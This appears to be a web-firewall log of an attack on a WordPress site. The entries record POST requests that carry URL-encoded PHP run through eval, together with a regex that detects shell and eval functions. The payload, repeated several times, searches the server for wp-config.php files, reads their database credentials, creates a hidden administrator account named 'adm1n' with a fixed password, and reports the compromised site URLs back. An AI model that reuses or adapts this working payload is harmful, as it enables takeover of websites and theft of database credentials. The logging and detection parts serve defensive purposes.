%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:16:30","213.209.159.254","POST","\/wp-includes\/class-wp-term.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> CmArqm:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/class-wp-term.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\n\nCmArqm=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
